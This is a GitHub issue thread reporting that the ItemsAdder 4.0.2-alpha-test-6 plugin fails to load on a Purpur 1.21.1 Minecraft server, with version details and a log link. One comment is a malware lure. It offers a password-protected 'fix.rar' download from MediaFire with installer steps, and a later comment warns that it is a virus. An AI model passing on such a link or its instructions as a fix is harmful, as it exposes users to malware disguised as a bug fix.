### ISSUE TITLE
ItemsAdder_4.0.2-alpha-test-6ItemsAdder_4.0.2-alpha-test-6 cannot be loaded on the 1.21.1 version server.

### ISSUE THREAD

**Issue by NEIKI19914** [PluginBugs/Issues-ItemsAdder#3922]
### Terms

- [X] I'm using the very latest version of ItemsAdder and its dependencies.
- [X] I am sure this is a bug and it is not caused by a misconfiguration or by another plugin.
- [X] I've looked for already existing issues on the [Issue Tracker](https://github.com/PluginBugs/Issues-ItemsAdder/issues) and haven't found any.
- [X] I already searched on the [plugin wiki](https://itemsadder.devs.beer/) to know if a solution is already known.
- [X] I already searched on the [forums](https://forum.devs.beer/) to check if anyone already has a solution for this.
- [X] I tested this with just ItemsAdder and its dependencies and with a vanilla client of the same version as the Server.

### Discord Username (optional)

neiki7273

### What happened?

![image](https://github.com/user-attachments/assets/ff6567ac-0f5a-454b-80f8-2b400b12411a)

### Steps to reproduce the issue

Normal updates occur after installing and upgrading plugins.

### Server version

purpur-1.21.1-2298

### ItemsAdder Version

ItemsAdder_4.0.2-alpha-test-6

### ProtocolLib Version

version: 5.3.0-SNAPSHOT-726

### LoneLibs Version

LoneLibs_1.0.57

### Full Server Log

https://mclo.gs/36phK56

**Comment by thewickening** [comment]
I am having the same issue.

**Comment by Bongton** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by Andre601** [comment]
> > [Removed by Mod]
> 
> Be careful, this is a virus, not a solution.

The website (mediafire) already blocked and flagged it as malicious, so this spam is effectively useless now.
